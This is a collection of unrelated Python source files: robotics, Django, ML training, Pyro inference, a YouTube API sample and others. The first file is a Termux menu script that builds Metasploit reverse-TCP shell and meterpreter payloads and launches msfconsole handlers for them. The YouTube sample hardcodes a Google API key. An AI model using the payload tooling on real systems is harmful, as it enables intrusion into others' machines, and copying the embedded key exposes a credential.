lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/meterpreter/reverse_tcp"
cfile(lh,lp,ply)
elif ch==3:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x86/shell/reverse_tcp"
cfile(lh,lp,ply)
elif ch==4:
table()
lh=ipd
lp=int(input(CY+"Enter LPORT:"+W+" "))
ply="linux/x64/shell/reverse_tcp"
cfile(lh,lp,ply)
else:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
os.system('clear')
print(Y+"\nStarting handler...............\n"+W)
os.system("msfconsole -r msh.rc")
os.remove('msh.rc')
os.system('clear')
lst()
sel2()
except ValueError:
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
elif ch==99:
check()
os.system('clear')
start()
main()
sel()
else:
check()
print(R+"\nInvalid choice! Please try again\n")
lst()
sel2()
except ValueError:
print(R+"\nInvalid input ! Please try again !\n")
sel2()
lst()
sel2()
elif c==3:
os.system('clear')
print(Y+"\n>>> Launching msfconsole..................\n\n"+W)
os.system("msfconsole")
os.system('clear')
start()
main()
sel()
elif c==4:
check()
print(R+"************************************************")
print(Y+"\nExit.........! Have a nice day :) ")
print(R+"\n------------"+CY+" Code by >> "+G+" Deadpool2000"+R+" ----------------------"+W)
print(R+"------------"+CY+" Youtube >> "+G+" https://bit.ly/2HnPZd2"+R+" ------------\n"+W)
else:
check()
print(R+"\nInvalid choice ! Please try again :(\n")
main()
sel()
except ValueError:
print(R+"\nInvalid input ! Please try again!\n")
sel()
def ch3():
if os.path.isfile(pth)==True:
if os.path.isfile('/data/data/com.termux/files/usr/bin/msfvenom')==False:
print(R+"""
************************************************\n"""
+Y+"""\nmsfconsole and msfvenom not found in '/data/data/com.termux/files/usr/bin/'\n""")
p=input(CY+"Install Metasploit in Termux ?"+G+" (y|n)"+R+" >>> "+W)
if p=="y":
ver="6.1.15"
os.system("apt install -y ruby wget apr apr-util libiconv zlib autoconf bison clang coreutils curl findutils git libffi libgmp libpcap postgresql readline libsqlite openssl libtool libxml2 libxslt ncurses pkg-config make libgrpc termux-tools ncurses-utils ncurses tar termux-elf-cleaner unzip zip")
lk="wget -O msf.tar.gz https://github.com/rapid7/metasploit-framework/archive/"+ver+".tar.gz"
os.system(str(lk))
os.system("mv msf.tar.gz $HOME")
os.system("tar -xvf $HOME/msf.tar.gz && mv metasploit-framework-"+ver+" $HOME/metasploit-framework && rm $HOME/msf.tar.gz")
os.system("gem install --no-document --verbose rubygems-update && update_rubygems")
os.system("gem install bundler && bundle config build.nokogiri --use-system-libraries && cd $HOME/metasploit-framework && bundle install")
os.system("cp assets/termux/msfconsole $PREFIX/bin/ && cp assets/termux/msfvenom $PREFIX/bin/")
os.system("chmod +x $PREFIX/bin/msfconsole")
os.system("chmod +x $PREFIX/bin/msfvenom")
os.system('clear')
checkver()
start()
mk()
check()
check2()
ch3()
main()
sel()
elif p=="n":
print(Y+"\nExit.........! Have a nice day :) ")
print(R+"\n------------"+CY+" Code by >>"+G+" Deadpool2000"+R+" ----------------------"+W)
print(R+"------------"+CY+" Youtube >>"+G+" https://bit.ly/2HnPZd2"+R+" ------------\n"+W)
exit(0)
else:
print(R+"\nInvalid choice ! Leaving.......\n"+W)
exit(0)
checkver()
start()
mk()
check()
check2()
ch3()
main()
sel()
except KeyboardInterrupt:
check()
print(CY+"""\n
************************************************"""+G+
"\n\n>>> "+R+"Interrupted!"+Y+" Exiting.........\n"+W)
print(R+"\n------------"+CY+" Code by >> "+G+" Deadpool2000"+R+" ----------------------"+W)
print(R+"------------"+CY+" Youtube >> "+G+" https://bit.ly/2HnPZd2"+R+" ------------\n"+W)
|
# Taken from https://github.com/CCGSRobotics/CCGSRobotics-battlebots
from pyax12.connection import Connection
servo_connection = Connection(port="/dev/ttyACM0", baudrate=1000000)
servo_connection.flush()
# Consult the robotics emanual for more infomation on how
# the dynamixel servos interpret communications.
# === JOINT FUNCTIONS === #
# Set up a dynamixel so that it behaves like joint.
def jointMode(ID):
servo_connection.set_cw_angle_limit(ID,0,False)
servo_connection.set_ccw_angle_limit(ID,1023,False)
# Move a dynamixel that has been set up as a joint.
def moveJoint(ID, position, speed):
servo_connection.goto(int(ID), int(position), int(speed), False)
# === WHEEL FUNCTIONS === #
# Set up a dynamixel so that it behaves like wheel.
def wheelMode(ID):
servo_connection.set_ccw_angle_limit(ID,0,False)
servo_connection.set_cw_angle_limit(ID,0,False)
# Move a dynamixel that has been set up as a wheel.
def moveWheel(ID, speed):
# Negative speed moves CW, positive speed moves CCW
# Convert negative values of speed to between 1024 and 2047
speed = (speed) * 1023 / 100
if speed < 0:
# Limit allowed reverse speed to prevent errors
if speed < -1024:
speed = 2047
else:
speed = 1023 - speed
else:
if speed > 1023:
# Limit allowed forward speed to prevent errors
speed = 1023
servo_connection.flush()
servo_connection.goto(int(ID), 0, int(speed), degrees=False)
print('* functions defined *') |
import pytest
import torch
import torch.nn as nn
from gyomei_trainer.modules.lr_scheduler import Scheduler
class NeuralNetwork(nn.Module):
def __init__(self):
super(NeuralNetwork, self).__init__()
self.flatten = nn.Flatten()
self.linear_relu_stack = nn.Sequential(
nn.Linear(28*28, 512),
nn.ReLU(),
nn.Linear(512, 512),
nn.ReLU(),
nn.Linear(512, 10),
)
def forward(self, x):
x = self.flatten(x)
logits = self.linear_relu_stack(x)
return logits
class TestScheduler:
@pytest.mark.parametrize(
'scheduler_name, created', [('linear', True), ('None', False),
('lambda', True), ('Lol', False)]
)
def test_scheduler(self, scheduler_name: str, created: bool):
"""Test learning rate scheduler.
AssertError activates in case of None scheduler and
AttributeError activates then step() method is used from
None type.
Args:
scheduler_name (str): Name of the scheduler. There is a
linear and lambda one now.
created (bool): Should the scheduler be created.
Returns:
"""
model = NeuralNetwork()
optimizer = torch.optim.Adam(params=model.parameters())
scheduler = None
if scheduler_name == 'linear':
scheduler = torch.optim.lr_scheduler.LinearLR(optimizer)
elif scheduler_name == 'lambda':
scheduler = torch.optim.lr_scheduler.LambdaLR(
optimizer, lr_lambda=[lambda epoch: epoch // 30])
try:
lr_scheduler = Scheduler(scheduler)
optimizer.step()
lr_scheduler.scheduler.step()
assert created
except (AssertionError, AttributeError):
assert not created
|
# Generated by Django 2.2.10 on 2020-04-29 22:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('youtube_saver', '0006_auto_20200430_0113'),
]
operations = [
migrations.DeleteModel(
name='YoutubeFormats',
),
]
|
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from article import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.index, name="index"),
path('about/', views.about, name="about"),
path('post/', include("article.urls")),
path('user/', include("user.urls")),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
# -*- coding: UTF-8 -*-
from . import config
from . import log
log = log.Log(__name__)
def set(filename, content):
try:
file = open(config.cache_root_path + filename, 'w+', encoding='utf8')
file.write(content)
file.close()
except Exception as e:
log.error(str(e))
def get(filename):
try:
file = open(config.cache_root_path + filename, 'r', encoding='utf8')
content = file.read()
file.close()
return content
except Exception as e:
log.error(str(e))
return ''
def splice_filename(filename, params):
'''According params dict to splice full cache file name.
Args:
filename: str, cache file name prefix.
params: dict, request params or other dict.
Return:
string, full file name
'''
items = params.items()
for key,value in items:
if key == 'access_token':
continue
if value != '':
filename = filename + '_' + value
return filename
def set_params(filename, params, content):
'''According params dict to cache content.
Args:
filename: str, cache file name prefix.
params: dict, request params or other dict.
content: str, cache content.
'''
if isinstance(content, bytes):
content = str(content, encoding='utf8')
return set(splice_filename(filename, params), content)
def get_params(filename, params):
'''According params dict to get cache content.
Args:
filename: str, cache file name prefix.
params: dict, request params or other dict.
Returns:
str, cache content.
if can't find cache file, then return ''
'''
return get(splice_filename(filename, params))
|
from config import *
from scipy.io import loadmat
from keras.utils import np_utils
import pickle
def load(file_path=dataset_path):
"""
load dataset from a .mat file and save mapping to ASCII into a file
:param
file_path: path to the .mat file (default value specified in config)
:return:
training and testing datasets and the number of classes
format: (train_data, train_labels), (test_data, test_labels), number_of_classes
"""
print("Loading dataset...")
# load dataset from file in matlab format
dataset_mat = loadmat(file_path)
# map classes (0 - 62) to ASCII codes for 0-9, A-Z, a-z
mapping = {char[0]: char[1] for char in dataset_mat['dataset'][0][0][2]}
# save mapping to a file
os.makedirs(os.path.dirname(mapping_path), exist_ok=True)
pickle.dump(mapping, open(mapping_path, 'wb'))
# load training data
# reshape flattened image to 2D array in matlab order (because of the format of the file)
train_images = dataset_mat['dataset'][0][0][0][0][0][0].reshape(-1, HEIGHT, WIDTH, 1, order='A')
train_labels = dataset_mat['dataset'][0][0][0][0][0][1]
# load testing data
# reshape flattened image to 2D array in matlab order (because of the format of the file)
test_images = dataset_mat['dataset'][0][0][1][0][0][0].reshape(-1, HEIGHT, WIDTH, 1, order='A')
test_labels = dataset_mat['dataset'][0][0][1][0][0][1]
# convert type to float32 (from int) and normalize (e.g. 255 to 1, 128 to 0.5, etc.)
train_images = train_images.astype('float32') / 255
test_images = test_images.astype('float32') / 255
# convert labels to one-hot (e.g. 5 to 0,0,0,0,0,1,0...)
classes = len(mapping) # number of classes
train_labels = np_utils.to_categorical(train_labels, classes)
test_labels = np_utils.to_categorical(test_labels, classes)
return (train_images, train_labels), (test_images, test_labels), classes
def load_mapping():
"""
load mapping of the dataset from file specified in config
:return:
the mapping of the dataset
"""
mapping = pickle.load(open(mapping_path, 'rb'))
return mapping
def get_classes(type=''):
"""
get list of classes based on selected type of chars
:param
type: type of characters (uppercase, lowercase, digit, blank for all classes)
:return:
list of classes
"""
# load mapping to convert chars to classes
mapping = load_mapping()
# result list
classes = []
# get keys from the mapping dictionary
keys = list(mapping.keys())
if type == 'digit':
# for each digit ASCII code add its class to the result
for i in range(48, 58):
# get the key by the value
classes.append(keys[list(mapping.values()).index(i)])
elif type == 'uppercase':
# for each uppercase ASCII code add its class to the result
for i in range(65, 91):
classes.append(keys[list(mapping.values()).index(i)])
elif type == 'lowercase':
# for each lowercase ASCII code add its class to the result
for i in range(97, 123):
classes.append(keys[list(mapping.values()).index(i)])
else:
# return all classes
classes = keys
return classes
|
import torch
from torch import nn
from tqdm.notebook import tqdm
from criterion import WassersteinLoss, GradientPenalty
class Trainer():
def __init__(self, generator, critic, g_optimizer, c_optimizer, device='cuda:0'):
self.generator = generator.to(device)
self.critic = critic.to(device)
self.g_optimizer = g_optimizer
self.c_optimizer = c_optimizer
self.g_criterion=WassersteinLoss().to(device)
self.c_criterion=WassersteinLoss().to(device)
self.c_penalty=GradientPenalty().to(device)
def train(self, dataloader, epochs=500, N=64, repeat=5, display_step=10, device='cuda:0'):
self.alpha = torch.rand((64, 1, 1, 1, 1)).requires_grad_().to(device)
self.data={'gloss':[], 'closs':[], 'cfloss':[], 'crloss':[], 'cploss':[]}
for epoch in tqdm(range(epochs)):
e_gloss=0
e_cfloss=0
e_crloss=0
e_cploss=0
e_closs=0
for real in dataloader:
real = real.to(device)
# Train Critic
b_closs=0
b_cfloss=0
b_crloss=0
b_cploss=0
for _ in range(repeat):
cords = torch.randn(N, 32).to(device)
style = torch.randn(N, 32).to(device)
melody = torch.randn(N, 4, 32).to(device)
groove = torch.randn(N, 4, 32).to(device)
self.c_optimizer.zero_grad()
with torch.no_grad():
fake = self.generator(cords, style, melody, groove).detach()
realfake = self.alpha* real + (1. - self.alpha)* fake
fake_pred = self.critic(fake)
real_pred = self.critic(real)
realfake_pred = self.critic(realfake)
fake_loss = self.c_criterion(fake_pred, -torch.ones_like(fake_pred))
real_loss = self.c_criterion(real_pred, torch.ones_like(real_pred))
penalty = self.c_penalty(realfake, realfake_pred)
closs = fake_loss + real_loss + 10* penalty
closs.backward(retain_graph=True)
self.c_optimizer.step()
b_cfloss += fake_loss.item()/repeat
b_crloss += real_loss.item()/repeat
b_cploss += 10* penalty.item()/repeat
b_closs += closs.item()/repeat
e_cfloss += b_cfloss/len(dataloader)
e_crloss += b_crloss/len(dataloader)
e_cploss += b_cploss/len(dataloader)
e_closs += b_closs/len(dataloader)
# Train Generator
self.g_optimizer.zero_grad()
cords = torch.randn(N, 32).to(device)
style = torch.randn(N, 32).to(device)
melody = torch.randn(N, 4, 32).to(device)
groove = torch.randn(N, 4, 32).to(device)
fake = self.generator(cords, style, melody, groove)
fake_pred = self.critic(fake)
b_gloss = self.g_criterion(fake_pred, torch.ones_like(fake_pred))
b_gloss.backward()
self.g_optimizer.step()
e_gloss += b_gloss.item()/len(dataloader)
self.data['gloss'].append(e_gloss)
self.data['closs'].append(e_closs)
self.data['cfloss'].append(e_cfloss)
self.data['crloss'].append(e_crloss)
self.data['cploss'].append(e_cploss)
if epoch% display_step==0:
print(f'Epoch {epoch}/{epochs} | Generator loss: {e_gloss:.3f} | '\
+ f'Critic loss: {e_closs:.3f} (fake: {e_cfloss:.3f}, real: {e_crloss:.3f}, penalty: {e_cploss:.3f})') |
"""
Contains fields used to select database models
"""
import logging
from . import basicfields
__author__ = 'Yu Lee Paul (Little Fish Solutions LTD)'
log = logging.getLogger(__name__)
class DbCodeSelectField(basicfields.SelectField):
"""
A select field that loads the database model by code
"""
def __init__(self, name, db_model, values=None, **kwargs):
if values is None:
# This will only work if the model has a name field
values = db_model.query.order_by(db_model.name).all()
self.valid_codes = None
else:
self.valid_codes = [v.code for v in values]
super(DbCodeSelectField, self).__init__(name, values, **kwargs)
# Save the database model so that we can query it later
self.db_model = db_model
def convert_value(self):
if self.value:
if self.valid_codes and self.value not in self.valid_codes:
self.error = 'Invalid selection'
else:
loaded_value = self.db_model.query.filter(self.db_model.code == self.value).first()
if loaded_value:
self.value = loaded_value
else:
self.error = 'Invalid value: %s' % self.value
self.value = None
class DbIdSelectField(basicfields.SelectField):
"""
A select field that loads the database model by code
"""
def __init__(self, name, db_model, values=None, **kwargs):
if values is None:
# This will only work if the model has a name field
values = db_model.query.order_by(db_model.name).all()
self.valid_ids = None
else:
self.valid_ids = [v.id for v in values]
super(DbIdSelectField, self).__init__(name, values, **kwargs)
# Save the database model so that we can query it later
self.db_model = db_model
def convert_value(self):
if self.value:
int_value = None
try:
int_value = int(self.value)
except ValueError:
pass
if int_value is None:
self.error = 'Invalid'
if not self.error and self.valid_ids and int_value not in self.valid_ids:
self.error = 'Invalid selection'
if not self.error:
loaded_value = self.db_model.query.filter(self.db_model.id == self.value).first()
if loaded_value:
self.value = loaded_value
else:
self.error = 'Invalid value: %s' % self.value
self.value = None
|
from __future__ import absolute_import, division, print_function
import warnings
from collections import namedtuple
import networkx
import numpy as np
import torch
import pyro
import pyro.poutine as poutine
from pyro.infer.util import torch_backward, torch_data_sum
from pyro.poutine.util import prune_subsample_sites
from pyro.util import check_model_guide_match, detach_iterable, ng_zeros
CostNode = namedtuple("CostNode", ["cost", "nonzero_expectation"])
def _get_baseline_options(site):
"""
Extracts baseline options from ``site["baseline"]``.
"""
# XXX default for baseline_beta currently set here
options_dict = site["baseline"].copy()
options_tuple = (options_dict.pop('nn_baseline', None),
options_dict.pop('nn_baseline_input', None),
options_dict.pop('use_decaying_avg_baseline', False),
options_dict.pop('baseline_beta', 0.90),
options_dict.pop('baseline_value', None))
if options_dict:
raise ValueError("Unrecognized baseline options: {}".format(options_dict.keys()))
return options_tuple
def _compute_downstream_costs(model_trace, guide_trace, #
model_vec_md_nodes, guide_vec_md_nodes, #
non_reparam_nodes):
# recursively compute downstream cost nodes for all sample sites in model and guide
# (even though ultimately just need for non-reparameterizable sample sites)
# 1. downstream costs used for rao-blackwellization
# 2. model observe sites (as well as terms that arise from the model and guide having different
# dependency structures) are taken care of via 'children_in_model' below
topo_sort_guide_nodes = list(reversed(list(networkx.topological_sort(guide_trace))))
topo_sort_guide_nodes = [x for x in topo_sort_guide_nodes
if guide_trace.nodes[x]["type"] == "sample"]
downstream_guide_cost_nodes = {}
downstream_costs = {}
for node in topo_sort_guide_nodes:
node_log_pdf_key = 'batch_log_pdf' if node in guide_vec_md_nodes else 'log_pdf'
downstream_costs[node] = model_trace.nodes[node][node_log_pdf_key] - \
guide_trace.nodes[node][node_log_pdf_key]
nodes_included_in_sum = set([node])
downstream_guide_cost_nodes[node] = set([node])
for child in guide_trace.successors(node):
child_cost_nodes = downstream_guide_cost_nodes[child]
downstream_guide_cost_nodes[node].update(child_cost_nodes)
if nodes_included_in_sum.isdisjoint(child_cost_nodes): # avoid duplicates
if node_log_pdf_key == 'log_pdf':
downstream_costs[node] += downstream_costs[child].sum()
else:
downstream_costs[node] += downstream_costs[child]
nodes_included_in_sum.update(child_cost_nodes)
missing_downstream_costs = downstream_guide_cost_nodes[node] - nodes_included_in_sum
# include terms we missed because we had to avoid duplicates
for missing_node in missing_downstream_costs:
mn_log_pdf_key = 'batch_log_pdf' if missing_node in guide_vec_md_nodes else 'log_pdf'
if node_log_pdf_key == 'log_pdf':
downstream_costs[node] += (model_trace.nodes[missing_node][mn_log_pdf_key] -
guide_trace.nodes[missing_node][mn_log_pdf_key]).sum()
else:
downstream_costs[node] += model_trace.nodes[missing_node][mn_log_pdf_key] - \
guide_trace.nodes[missing_node][mn_log_pdf_key]
# finish assembling complete downstream costs
# (the above computation may be missing terms from model)
# XXX can we cache some of the sums over children_in_model to make things more efficient?
for site in non_reparam_nodes:
children_in_model = set()
for node in downstream_guide_cost_nodes[site]:
children_in_model.update(model_trace.successors(node))
# remove terms accounted for above
children_in_model.difference_update(downstream_guide_cost_nodes[site])
for child in children_in_model:
child_log_pdf_key = 'batch_log_pdf' if child in model_vec_md_nodes else 'log_pdf'
site_log_pdf_key = 'batch_log_pdf' if site in guide_vec_md_nodes else 'log_pdf'
assert (model_trace.nodes[child]["type"] == "sample")
if site_log_pdf_key == 'log_pdf':
downstream_costs[site] += model_trace.nodes[child][child_log_pdf_key].sum()
else:
downstream_costs[site] += model_trace.nodes[child][child_log_pdf_key]
return downstream_costs
def _compute_elbo_reparam(model_trace, guide_trace, non_reparam_nodes):
# prepare a list of all the cost nodes, each of which is +- log_pdf
cost_nodes = []
for name, model_site in model_trace.nodes.items():
if model_site["type"] == "sample":
if model_site["is_observed"]:
cost_nodes.append(CostNode(model_site["log_pdf"], True))
else:
# cost node from model sample
cost_nodes.append(CostNode(model_site["log_pdf"], True))
# cost node from guide sample
guide_site = guide_trace.nodes[name]
zero_expectation = name in non_reparam_nodes
cost_nodes.append(CostNode(-guide_site["log_pdf"], not zero_expectation))
# compute the elbo; if all stochastic nodes are reparameterizable, we're done
# this bit is never differentiated: it's here for getting an estimate of the elbo itself
elbo = torch_data_sum(sum(c.cost for c in cost_nodes))
# compute the surrogate elbo, removing terms whose gradient is zero
# this is the bit that's actually differentiated
# XXX should the user be able to control if these terms are included?
surrogate_elbo = sum(c.cost for c in cost_nodes if c.nonzero_expectation)
return elbo, surrogate_elbo
def _compute_elbo_non_reparam(guide_trace, guide_vec_md_nodes, #
non_reparam_nodes, downstream_costs):
# construct all the reinforce-like terms.
# we include only downstream costs to reduce variance
# optionally include baselines to further reduce variance
# XXX should the average baseline be in the param store as below?
surrogate_elbo = 0.0
baseline_loss = 0.0
for node in non_reparam_nodes:
guide_site = guide_trace.nodes[node]
log_pdf_key = 'batch_log_pdf' if node in guide_vec_md_nodes else 'log_pdf'
downstream_cost = downstream_costs[node]
baseline = 0.0
(nn_baseline, nn_baseline_input, use_decaying_avg_baseline, baseline_beta,
baseline_value) = _get_baseline_options(guide_site)
use_nn_baseline = nn_baseline is not None
use_baseline_value = baseline_value is not None
assert(not (use_nn_baseline and use_baseline_value)), \
"cannot use baseline_value and nn_baseline simultaneously"
if use_decaying_avg_baseline:
avg_downstream_cost_old = pyro.param("__baseline_avg_downstream_cost_" + node,
ng_zeros(1), tags="__tracegraph_elbo_internal_tag")
avg_downstream_cost_new = (1 - baseline_beta) * downstream_cost + \
baseline_beta * avg_downstream_cost_old
avg_downstream_cost_old.data = avg_downstream_cost_new.data # XXX copy_() ?
baseline += avg_downstream_cost_old
if use_nn_baseline:
# block nn_baseline_input gradients except in baseline loss
baseline += nn_baseline(detach_iterable(nn_baseline_input))
elif use_baseline_value:
# it's on the user to make sure baseline_value tape only points to baseline params
baseline += baseline_value
if use_nn_baseline or use_baseline_value:
# accumulate baseline loss
baseline_loss += torch.pow(downstream_cost.detach() - baseline, 2.0).sum()
guide_log_pdf = guide_site[log_pdf_key] / guide_site["scale"] # not scaled by subsampling
if use_nn_baseline or use_decaying_avg_baseline or use_baseline_value:
if downstream_cost.size() != baseline.size():
raise ValueError("Expected baseline at site {} to be {} instead got {}".format(
node, downstream_cost.size(), baseline.size()))
downstream_cost = downstream_cost - baseline
surrogate_elbo += (guide_log_pdf * downstream_cost.detach()).sum()
return surrogate_elbo, baseline_loss
class TraceGraph_ELBO(object):
"""
A TraceGraph implementation of ELBO-based SVI. The gradient estimator
is constructed along the lines of reference [1] specialized to the case
of the ELBO. It supports arbitrary dependency structure for the model
and guide as well as baselines for non-reparameteriable random variables.
Where possible, dependency information as recorded in the TraceGraph is
used to reduce the variance of the gradient estimator.
References
[1] `Gradient Estimation Using Stochastic Computation Graphs`,
John Schulman, Nicolas Heess, Theophane Weber, Pieter Abbeel
[2] `Neural Variational Inference and Learning in Belief Networks`
Andriy Mnih, Karol Gregor
"""
def __init__(self, num_particles=1, enum_discrete=False):
"""
:param num_particles: the number of particles (samples) used to form the estimator
:param bool enum_discrete: whether to sum over discrete latent variables, rather than sample them
"""
super(TraceGraph_ELBO, self).__init__()
self.num_particles = num_particles
self.enum_discrete = enum_discrete
def _get_traces(self, model, guide, *args, **kwargs):
"""
runs the guide and runs the model against the guide with
the result packaged as a tracegraph generator
"""
for i in range(self.num_particles):
if self.enum_discrete:
raise NotImplementedError("https://github.com/uber/pyro/issues/220")
guide_trace = poutine.trace(guide,
graph_type="dense").get_trace(*args, **kwargs)
model_trace = poutine.trace(poutine.replay(model, guide_trace),
graph_type="dense").get_trace(*args, **kwargs)
check_model_guide_match(model_trace, guide_trace)
guide_trace = prune_subsample_sites(guide_trace)
model_trace = prune_subsample_sites(model_trace)
weight = 1.0 / self.num_particles
yield weight, model_trace, guide_trace
def loss(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Evaluates the ELBO with an estimator that uses num_particles many samples/particles.
"""
elbo = 0.0
for weight, model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
guide_trace.log_pdf(), model_trace.log_pdf()
elbo_particle = 0.0
for name in model_trace.nodes.keys():
if model_trace.nodes[name]["type"] == "sample":
if model_trace.nodes[name]["is_observed"]:
elbo_particle += model_trace.nodes[name]["log_pdf"]
else:
elbo_particle += model_trace.nodes[name]["log_pdf"]
elbo_particle -= guide_trace.nodes[name]["log_pdf"]
elbo += torch_data_sum(weight * elbo_particle)
loss = -elbo
if np.isnan(loss):
warnings.warn('Encountered NAN loss')
return loss
def loss_and_grads(self, model, guide, *args, **kwargs):
"""
:returns: returns an estimate of the ELBO
:rtype: float
Computes the ELBO as well as the surrogate ELBO that is used to form the gradient estimator.
Performs backward on the latter. Num_particle many samples are used to form the estimators.
If baselines are present, a baseline loss is also constructed and differentiated.
"""
loss = 0.0
for weight, model_trace, guide_trace in self._get_traces(model, guide, *args, **kwargs):
loss += self._loss_and_grads_particle(weight, model_trace, guide_trace)
return loss
def _loss_and_grads_particle(self, weight, model_trace, guide_trace):
# get info regarding rao-blackwellization of vectorized map_data
guide_vec_md_info = guide_trace.graph["vectorized_map_data_info"]
model_vec_md_info = model_trace.graph["vectorized_map_data_info"]
guide_vec_md_condition = guide_vec_md_info['rao-blackwellization-condition']
model_vec_md_condition = model_vec_md_info['rao-blackwellization-condition']
do_vec_rb = guide_vec_md_condition and model_vec_md_condition
if not do_vec_rb:
warnings.warn(
"Unable to do fully-vectorized Rao-Blackwellization in TraceGraph_ELBO. "
"Falling back to higher-variance gradient estimator. "
"Try to avoid these issues in your model and guide:\n{}".format("\n".join(
guide_vec_md_info["warnings"] | model_vec_md_info["warnings"])))
guide_vec_md_nodes = guide_vec_md_info['nodes'] if do_vec_rb else set()
model_vec_md_nodes = model_vec_md_info['nodes'] if do_vec_rb else set()
# have the trace compute all the individual (batch) log pdf terms
# so that they are available below
guide_trace.compute_batch_log_pdf(site_filter=lambda name, site: name in guide_vec_md_nodes)
guide_trace.log_pdf()
model_trace.compute_batch_log_pdf(site_filter=lambda name, site: name in model_vec_md_nodes)
model_trace.log_pdf()
# compute elbo for reparameterized nodes
non_reparam_nodes = set(guide_trace.nonreparam_stochastic_nodes)
elbo, surrogate_elbo = _compute_elbo_reparam(model_trace, guide_trace, non_reparam_nodes)
# the following computations are only necessary if we have non-reparameterizable nodes
baseline_loss = 0.0
if non_reparam_nodes:
downstream_costs = _compute_downstream_costs(
model_trace, guide_trace, model_vec_md_nodes, guide_vec_md_nodes, non_reparam_nodes)
surrogate_elbo_term, baseline_loss = _compute_elbo_non_reparam(
guide_trace, guide_vec_md_nodes, non_reparam_nodes, downstream_costs)
surrogate_elbo += surrogate_elbo_term
# collect parameters to train from model and guide
trainable_params = set(site["value"]
for trace in (model_trace, guide_trace)
for site in trace.nodes.values()
if site["type"] == "param")
if trainable_params:
surrogate_loss = -surrogate_elbo
torch_backward(weight * (surrogate_loss + baseline_loss))
pyro.get_param_store().mark_params_active(trainable_params)
loss = -elbo
if np.isnan(loss):
warnings.warn('Encountered NAN loss')
return weight * loss
|
__version__ = "20.02.3"
|
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 14 04:37:02 2017
@author: gurjot
"""
### START BOILERPLATE CODE
# Sample Python code for user authorization
#import httplib2
from apiclient.discovery import build
#from oauth2client.client import flow_from_clientsecrets
#from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret.
CLIENT_SECRETS_FILE = "client_secrets.json"
# This OAuth 2.0 access scope allows for full read/write access to the
# authenticated user's account and requires requests to use an SSL connection.
YOUTUBE_READ_WRITE_SSL_SCOPE = "https://www.googleapis.com/auth/youtube.force-ssl"
API_SERVICE_NAME = "youtube"
API_VERSION = "v3"
API_KEY = 'AIzaSyADmjxtSo8uKscHXuREUsZdTB-0xIzmpT8'
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = "WARNING: Please configure OAuth 2.0"
# Authorize the request and store authorization credentials.
def get_authenticated_service(args):
# flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE, scope=YOUTUBE_READ_WRITE_SSL_SCOPE,
# message=MISSING_CLIENT_SECRETS_MESSAGE)
# storage = Storage("youtube-api-snippets-oauth2.json")
# credentials = storage.get()
# if credentials is None or credentials.invalid:
# credentials = run_flow(flow, storage, args)
# Trusted testers can download this discovery document from the developers page
# and it should be in the same directory with the code.
return build(API_SERVICE_NAME, API_VERSION,developerKey=API_KEY)
# http=credentials.authorize(httplib2.Http()))
args = argparser.parse_args()
service = get_authenticated_service(args)
def print_results(results):
print(results)
# Build a resource based on a list of properties given as key-value pairs.
# Leave properties with empty values out of the inserted resource.
def build_resource(properties):
resource = {}
for p in properties:
# Given a key like "snippet.title", split into "snippet" and "title", where
# "snippet" will be an object and "title" will be a property in that object.
prop_array = p.split('.')
ref = resource
for pa in range(0, len(prop_array)):
is_array = False
key = prop_array[pa]
# Convert a name like "snippet.tags[]" to snippet.tags, but handle
# the value as an array.
if key[-2:] == '[]':
key = key[0:len(key)-2:]
is_array = True
if pa == (len(prop_array) - 1):
# Leave properties without values out of inserted resource.
if properties[p]:
if is_array:
ref[key] = properties[p].split(',')
else:
ref[key] = properties[p]
elif key not in ref:
# For example, the property is "snippet.title", but the resource does
# not yet have a "snippet" object. Create the snippet object here.
# Setting "ref = ref[key]" means that in the next time through the
# "for pa in range ..." loop, we will be setting a property in the
# resource's "snippet" object.
ref[key] = {}
ref = ref[key]
else:
# For example, the property is "snippet.description", and the resource
# already has a "snippet" object.
ref = ref[key]
return resource
# Remove keyword arguments that are not set
def remove_empty_kwargs(**kwargs):
good_kwargs = {}
if kwargs is not None:
for key, value in kwargs.iteritems():
if value:
good_kwargs[key] = value
return good_kwargs
### END BOILERPLATE CODE
# Sample python code for playlistItems.list
def playlist_items_list_by_playlist_id(service, **kwargs):
kwargs = remove_empty_kwargs(**kwargs) # See full sample for function
results = service.playlistItems().list(
**kwargs
).execute()
print_results(results)
playlist_items_list_by_playlist_id(service,
part='snippet,contentDetails',
maxResults=25,
playlistId='PL-2rrpXWmCSLuUE_5IPkihUE85SUrilyj')
|
################################################################################
#
# Copyright (c) 2019, the Perspective Authors.
#
# This file is part of the Perspective library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
import tornado
from random import random
from functools import partial
from .dispatch import async_queue, subscribe, unsubscribe
def view(
client,
table_name,
columns=None,
row_pivots=None,
column_pivots=None,
aggregates=None,
sort=None,
filter=None,
expressions=None,
):
"""Create a new View by posting a message to the Perspective server
implementation through `client`, returning a Future that will resolve to a
`PerspectiveViewProxy` object whose API must be called with `await` or
`yield`, or an Exception if the View creation failed.
"""
name = str(random())
config = {
"columns": columns,
"row_pivots": row_pivots,
"column_pivots": column_pivots,
"aggregates": aggregates,
"sort": sort,
"filter": filter,
"expressions": expressions,
}
msg = {
"cmd": "view",
"view_name": name,
"table_name": table_name,
"config": config,
}
future = tornado.concurrent.Future()
client.post(msg, future)
return future
class PerspectiveViewProxy(object):
def __init__(self, client, name):
"""A proxy for a Perspective `View` object elsewhere, i.e. on a remote
server accessible through a Websocket.
All public API methods on this proxy are async, and must be called
with `await` or a `yield`-based coroutine.
Args:
